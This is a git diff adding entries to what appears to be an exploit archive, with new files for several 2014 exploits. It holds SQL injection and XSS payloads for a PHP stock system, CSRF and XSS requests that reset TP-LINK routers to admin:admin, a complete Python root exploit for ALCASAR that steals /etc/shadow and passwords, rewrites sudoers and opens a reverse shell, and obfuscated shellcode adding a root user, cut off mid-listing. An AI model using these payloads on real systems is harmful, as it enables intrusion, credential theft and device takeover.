diff --git a/files.csv b/files.csv
index 1dfa27863..0a50179b9 100755
--- a/files.csv
+++ b/files.csv
@@ -3143,7 +3143,7 @@ id,file,description,date,author,platform,type,port
3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln",2007-03-15,WiLdBoY,asp,webapps,0
-3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
+3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0
3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0
@@ -31137,5 +31137,23 @@ id,file,description,date,author,platform,type,port
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
+34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross Site Scripting",2014-09-08,smash,php,webapps,80
+34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
+34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
+34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80
+34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
+34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
+34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
+34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
+34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
+34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
+34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
+34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
+34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0
+34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0
+34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0
+34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
+34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
+34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
diff --git a/platforms/aix/dos/34588.txt b/platforms/aix/dos/34588.txt
new file mode 100755
index 000000000..c471a5b7f
--- /dev/null
+++ b/platforms/aix/dos/34588.txt
@@ -0,0 +1,189 @@
+# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
+# Date : 9-9-2014
+# Author : jsass
+?# Vendor Homepage: ?http://www.posnic.com/?
+# Software Link:? http://sourceforge.net/projects/stockmanagement/
+# Version: ?1.02
+# Tested on: kali linux
+# Twitter : @KwSecurity
+# Group : Q8 GRAY HAT TEAM
+
+#########################################################################################################
+
+
+
+XSS install.php
+
+code :
+
+if(isset($_REQUEST['msg'])) {
+
+ $msg=$_REQUEST['msg'];
+ echo "$msg
";
+ }
+
+
+exploit :
+
+http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
+
+
+#########################################################################################################
+
+SQL INJECTION : stock.php
+
+code :
+
+
+include_once("init.php");
+$q = strtolower($_GET["q"]);
+if (!$q) return;
+$db->query("SELECT * FROM stock_avail where quantity >0 ");
+ while ($line = $db->fetchNextObject()) {
+
+ if (strpos(strtolower($line->name), $q) !== false) {
+ echo "$line->name\n";
+
+ }
+ }
+
+
+exploit :
+
+
+localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
+
+
+#########################################################################################################
+SQL INJECTION : view_customers.php
+
+
+
+
+code :
+
+$SQL = "SELECT * FROM customer_details";
+if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
+{
+
+$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
+
+
+}
+
+
+
+
+
+exploit :
+
+
+http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
+
+POST
+
+searchtxt=1(inject)&Search=Search
+
+searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
+#########################################################################################################
+
+
+SQL INJECTION : view_product.php
+
+code :
+
+if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
+ $limit=$_GET['limit'];
+ $_GET['limit']=10;
+}
+
+ $page = $_GET['page'];
+
+
+ if($page)
+
+ $start = ($page - 1) * $limit; //first item to display on this page
+
+ else
+
+ $start = 0; //if no page var is given, set start to 0
+
+
+
+ /* Get data. */
+
+ $sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
+ if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
+{
+
+ $sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
+
+
+}
+
+
+ $result = mysql_query($sql);
+
+
+
+exploit :
+
+localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
+and
+
+localhost/demo/POSNIC1.02DesignFix/view_product.php
+post
+searchtxt=a(inject)&Search=Search
+
+
+
+
+#########################################################################################################
+
+UPLOAD : logo_set.php
+
+code :
+
+ 0)
+ {
+ echo "Return Code: " . $_FILES["file"]["error"] . "
";
+ }
+ else
+ {
+ $upload= $_FILES["file"]["name"] ;
+ $type=$_FILES["file"]["type"];
+
+
+
+
+
+
+exploit :
+
+http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
+#########################################################################################################
+
+
+
+AND MORE BUGS
+
+Bye
+
+#########################################################################################################
+
+
+Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
+
+sec4ever.com & alm3refh.com
+
+#########################################################################################################
\ No newline at end of file
diff --git a/platforms/hardware/webapps/34583.txt b/platforms/hardware/webapps/34583.txt
new file mode 100755
index 000000000..c94617535
--- /dev/null
+++ b/platforms/hardware/webapps/34583.txt
@@ -0,0 +1,183 @@
+#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
+#Date: 01.07.14
+#Vendor: TP-LINK
+#Affected versions: TL-WR340G/TL-WR340GD
+#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
+#Contact: smash [at] devilteam.pl
+
+Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
+
+Config file - 192.168.1.1/userRpm/config.bin
+
+
+#1 - Cross Site Scripting
+
+
+ a) Persistent XSS in Network > WAN Settings
+
+Vulnerable parameter - hostName.
+
+Request:
+GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
+Host: 192.168.1.1
+
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+
+",
+0,0 );
+
+(...)
+
+
+ b) Persitent XSS in Wireless Settings
+
+Vulnerable parameter - ssid.
+
+Request:
+GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+
+xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
+0,0 );
+
+(...)
+
+
+ c) Persistent XSS in DHCP Settings
+
+Vulnerable parameter - domain.
+
+Request:
+GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain='"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
+
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+
+'\"",
+"0.0.0.0",
+"0.0.0.0",
+1,
+1,
+0,0 );
+
+(...)
+
+
+ d) Persitent XSS in Security > Domain Filtering
+
+Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
+
+Request:
+GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
+Host: 192.168.1.1
+
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+
+'\"", 1,
+0,0 );
+
+(...)
+
+
+ e) Persistent XSS in Dynamic DNS Settings
+
+Vulnerable parameters - username & cliUrl.
+
+Request:
+GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=&Save=Save HTTP/1.1
+Host: 192.168.1.1
+
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+
+",
+0,
+0,
+2,
+2,
+0,
+1,
+0,0 );
+
+(...)
+
+
+#2 - CSRF
+
+
+ a) Change LAN IP
+
+Parameter lanip stands for further ip.
+
+GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+
+
+ b) Change remote managment settings
+
+GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+
+
+ c) Clear syslog
+
+GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
+Host: 192.168.1.1
+
+
+ d) Reboot device
+
+GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
+Host: 192.168.1.1
+
+
+ e) Restore factory defaults (admin:admin)
+
+GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
+Host: 192.168.1
\ No newline at end of file
diff --git a/platforms/hardware/webapps/34584.txt b/platforms/hardware/webapps/34584.txt
new file mode 100755
index 000000000..15535e921
--- /dev/null
+++ b/platforms/hardware/webapps/34584.txt
@@ -0,0 +1,194 @@
+#Title: TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
+#Date: 30.06.14
+#Vendor: TP-LINK
+#Affected versions: TL-WR841N / TL-WR841ND
+#Tested on: Firmware Version - 3.13.27 Build 121101 Rel.38183n, Hardware Version - WR841N v8 00000000 [at] Linux
+#Contact: smash [at] devilteam.pl
+
+#1 - Reflected XSS in Wireless Settings
+
+Vulnerable parameters - ssid1, ssid2, ssid3, ssid4.
+
+Variables of ssid parameters are being included to wlanPara array. Because of poor filtration of those values, it is able to execute specific javascript command as shown below.
+
+While system log and config is being saved as local file (http://192.168.0.1/userRpm/SystemLog.txt & http://192.168.0.1/userRpm/config.bin), it is able to hjiack both via xss.
+
+Request:
+http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=ROUTERNAME&ssid2=ROUTERNAME_2&ssid3=ROUTERNAME_3&ssid4=ROUTERNAME_4®ion=101&band=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save
+
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+(...)
+",108,101,1,5,1,1,15,2,71,0,0,0,"cript>","ROUTERNAME_3","ROUTERNAME_4",691810163,0,0,0,"","",1,"",1,1,3,3,0,1,1,36,0,0,"","","","","","","","",1,"",0,"","",1,0,0,1,0,1,0,0 );
+
+
+#2 - Persistent XSS & CSRF in Wireless Security Settings
+
+Vulnerable parameter - pskSecret.
+
+Same as above, variable of pskSecret (password) is being included in javascript array. Because of no CSRF prevention, it is able to change the password by visiting url below. pskSecret value is responsible for further password.
+
+Request:
+http://192.168.0.1/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=2&pskCipher=3&pskSecret=test&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save
+
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+
+", 1, 0, 0, 1, 3, 0, 0, 0, 5, 0, 1, "", 1,
+0,0 );
+
+
+#3 - Persistent XSS & CSRF in Mail Settings
+
+Vulnerable parameters - FromAddr, ToAddr, SMTPAddr.
+
+Reason is the same.
+
+Request:
+http://192.168.0.1/userRpm/AutoEmailRpm.htm?FromAddr=test%40test.com&ToAddr=test1%40test.com&SMTPAddr=&User=&Password=&VeriPass=&Save=Save
+
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+
+",
+0,
+"",
+0,
+0,
+0,
+0,
+0,0 );
+
+
+It is able to steal system logs by forcing our victim to set our mail settings via csrf, then logs will be send after visiting address below:
+http://192.168.0.1/userRpm/SystemLogRpm.htm?doMailLog=2
+
+#4 - Persistent XSS & CSRF in Time Settings
+
+Vulnerable parameters - ntpA & ntpB.
+
+Request:
+http://192.168.0.1/userRpm/DateTimeCfgRpm.htm?timezone=0&month=7&day=1&year=2014&hour=2&minute=44&second=18&ntpA=xssed<>",
+"0.0.0.0",
+2,
+2,
+0,
+2,
+10,
+1,
+0,
+3,
+0,
+0,
+0,0 );
+
+
+#5 - Persistent XSS & CSRF in Dynamic DNS settings
+
+Vulnerable parameters - username, password, cliUrl.
+
+Request:
+http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=&pwd=password&cliUrl=&Save=Save
+
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+
+",
+"password",
+"",
+0,
+0,
+3,
+2,
+0,
+1,
+0,0 );
+
+
+#6 - Persistent XSS & CSRF in DHCP settings
+
+Vulnerable parameter - domain.
+
+Request:
+http://192.168.0.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&gateway=192.168.0.1&domain=xssed<>&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save
+
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+
+xssed<>",
+"0.0.0.0",
+"0.0.0.0",
+1,
+0,0 );
+
+
+#7 - Other CSRF's
+
+ a) Clear system logs
+
+http://192.168.0.1/userRpm/SystemLogRpm.htm?logType=0&logLevel=7&ClearLog=Clear+Log&selPage=1&Page=1
+
+ b) Reboot device
+
+http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reboot
+
+ c) Factory defaults reset (admin:admin)
+
+http://192.168.0.1/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore
+
+Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting.
\ No newline at end of file
diff --git a/platforms/linux/remote/34595.py b/platforms/linux/remote/34595.py
new file mode 100755
index 000000000..f234c9507
--- /dev/null
+++ b/platforms/linux/remote/34595.py
@@ -0,0 +1,213 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+####
+#
+# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability
+#
+# Author: eF
+# Date : 2014-02-10
+#
+#
+# db 88 ,ad8888ba, db ad88888ba db 88888888ba
+# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
+# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
+# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
+# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
+# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
+# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
+# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
+#
+#
+# ALCASAR is a free Network Access Controller which controls the Internet
+# consultation networks. It authenticates, attributes and protects users'
+# access regardless their connected equipment (PC, Pokédex, game console,
+# etc.).
+#
+#
+# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a
+# trivial vulnerability. In the "index.php" file:
+#
+# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
+# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
+#
+# By sending a specially crafted value in the "host" HTTP header, it is possible
+# to inject the exec() function in order to execute commands as Apache user.
+#
+# In addition, the Apache user is able to call sudo for these binaries:
+#
+# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
+# /usr/local/bin/alcasar-conf.sh
+# /usr/local/sbin/alcasar-mysql.sh
+# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
+# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
+# /usr/local/bin/alcasar-archive.sh
+# /usr/bin/radwho,/usr/sbin/chilli_query
+# /usr/local/sbin/alcasar-logout.sh
+# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
+# /usr/bin/openssl
+#
+# As a result, we can use /usr/bin/openssl to read a file as root:
+#
+# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
+#
+# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.):
+#
+# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
+#
+# In this exploit, I choose to modify the "sudoers" file.
+#
+# Note: this vulnerability has been discovered in less than 30 seconds.
+# Others vulnerabilities are still present. This code has never been audited...
+# The PHP code is dreadful and needs to be rewritten from scratch.
+#
+# Example (post-auth) in file acc/admin/activity.php:
+#
+# if (isset($_POST['action'])){
+# switch ($_POST['action']){
+# case 'user_disconnect' :
+# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]");
+#
+#
+# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less.
+#
+#
+# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh"
+#
+# [+] Hello, first here are some passwords for you:
+# Password to protect the boot menu (GRUB) : cV9eEz1g
+# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
+# Name and password of Mysql/mariadb user : radius / oRNln64j
+# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
+# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
+#
+# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7:::
+#
+# [...]
+#
+# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
+#
+# username value
+# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H.
+#
+# [-] whoami (should be apache):
+# uid=495(apache) gid=492(apache) groups=492(apache)
+#
+# [+] On the way to the uid 0...
+# [-] Got root?
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# [+] Your command Sir:
+# The Running version (2.8) is up to date
+#
+#
+####
+
+import sys, os, re, httplib
+
+class PWN_Alcasar:
+
+ def __init__(self, host):
+ self.host = host
+ self.root = False
+
+ def exec_cmd(self, cmd, output=False):
+ tag = os.urandom(4).encode('hex')
+
+ cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
+ if self.root:
+ cmd = 'sudo %s' % cmd
+
+ headers = {
+ 'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n',''))
+ }
+
+ c = httplib.HTTPConnection(self.host)
+ c.request('GET', '/index.php', '', headers)
+ r = c.getresponse()
+ data = r.read()
+ c.close()
+
+ if data.find(tag) != -1:
+ m = re.search(r'%s, (.*)\s' % tag, data)
+ if m:
+ data = m.group(1).decode('base64')
+ if output:
+ print data
+ return data
+ return None
+
+ def read_file(self, filepath, output=True):
+ return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output)
+
+ def read_passwords(self):
+ self.read_file('/root/ALCASAR-passwords.txt')
+ self.read_file('/etc/shadow')
+ self.read_file('/usr/local/etc/digest/key_all')
+ self.read_file('/usr/local/etc/digest/key_admin')
+ self.read_file('/usr/local/etc/digest/key_backup')
+ self.read_file('/usr/local/etc/digest/key_manager')
+ self.read_file('/usr/local/etc/digest/key_only_admin')
+ self.read_file('/usr/local/etc/digest/key_only_backup')
+ self.read_file('/usr/local/etc/digest/key_only_manager')
+ alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
+ if alcasar_mysql:
+ m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
+ if m:
+ radiuspwd = m.group(1)
+ sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
+ self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
+
+ def edit_sudoers(self):
+ self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64')
+ self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers')
+ self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers')
+ self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64')
+ self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers')
+ self.exec_cmd('sudo rm -f /tmp/sudoers*')
+ self.root = True
+
+ def reverse_shell(self, rip, rport='80'):
+ payload = 'import socket,subprocess,os;'
+ payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
+ payload += 's.connect((\'%s\',%s));' % (rip, rport)
+ payload += 'os.dup2(s.fileno(),0);'
+ payload += 'os.dup2(s.fileno(),1);'
+ payload += 'os.dup2(s.fileno(),2);'
+ payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
+ return self.exec_cmd('python -c "%s"' % payload)
+
+def usage():
+ print 'Usage: %s host command (ip) (port)' % sys.argv[0]
+ print ' "command" can be a shell command or "reverseshell"'
+ sys.exit(0)
+
+if __name__ == '__main__':
+
+ if len(sys.argv) < 3:
+ usage()
+
+ cmd = sys.argv[2]
+ if cmd == 'reverseshell':
+ if len(sys.argv) < 5:
+ print '[!] Need IP and port for the reverse shell...'
+ sys.exit(0)
+ rip = sys.argv[3]
+ rport = sys.argv[4] # 80 is a good one...
+
+ exploit = PWN_Alcasar(sys.argv[1])
+ print '[+] Hello, first here are some passwords for you:'
+ exploit.read_passwords()
+ print '[-] whoami (should be apache):'
+ exploit.exec_cmd('id', output=True)
+ print '[+] On the way to the uid 0...'
+ exploit.edit_sudoers()
+ print '[-] Got root?'
+ exploit.exec_cmd('id', output=True)
+ if cmd == 'reverseshell':
+ print '[+] You should now have a shell on %s:%s' % (rip, rport)
+ exploit.reverse_shell(rip, rport)
+ else:
+ print '[+] Your command Sir:'
+ exploit.exec_cmd(cmd, output=True)
+ sys.exit(1)
\ No newline at end of file
diff --git a/platforms/linux/shellcode/34592.c b/platforms/linux/shellcode/34592.c
new file mode 100755
index 000000000..a2d639d2b
--- /dev/null
+++ b/platforms/linux/shellcode/34592.c
@@ -0,0 +1,209 @@
+/*
+#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
+#length: 521 bytes
+#Date: 8 September 2018
+#Author: Ali Razmjoo
+#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
+
+
+
+Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
+Thanks to Jonathan Salwan
+
+
+chmod('/etc/passwd',777)
+chmod('/etc/shadow',777)
+open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
+setreuid() , execve('/bin/sh')
+
+
+root@g3n3rall:~/Desktop/xpl# objdump -d f.o
+
+f.o: file format elf32-i386
+
+
+Disassembly of section .text:
+
+00000000 <_start>:
+ 0: 31 c0 xor %eax,%eax
+ 2: 31 db xor %ebx,%ebx
+ 4: 31 c9 xor %ecx,%ecx
+ 6: 31 d2 xor %edx,%edx
+ 8: bb 59 45 4f 53 mov $0x534f4559,%ebx
+ d: ba 33 36 38 37 mov $0x37383633,%edx
+ 12: 31 d3 xor %edx,%ebx
+ 14: 53 push %ebx
+ 15: c1 eb 08 shr $0x8,%ebx
+ 18: 53 push %ebx
+ 19: bb 7a 46 59 45 mov $0x4559467a,%ebx
+ 1e: ba 55 36 38 36 mov $0x36383655,%edx
+ 23: 31 d3 xor %edx,%ebx
+ 25: 53 push %ebx
+ 26: bb 67 58 45 4e mov $0x4e455867,%ebx
+ 2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
+ 30: 31 d3 xor %edx,%ebx
+ 32: 53 push %ebx
+ 33: 89 e3 mov %esp,%ebx
+ 35: 68 41 41 ff 01 push $0x1ff4141
+ 3a: 59 pop %ecx
+ 3b: c1 e9 08 shr $0x8,%ecx
+ 3e: c1 e9 08 shr $0x8,%ecx
+ 41: 6a 0f push $0xf
+ 43: 58 pop %eax
+ 44: cd 80 int $0x80
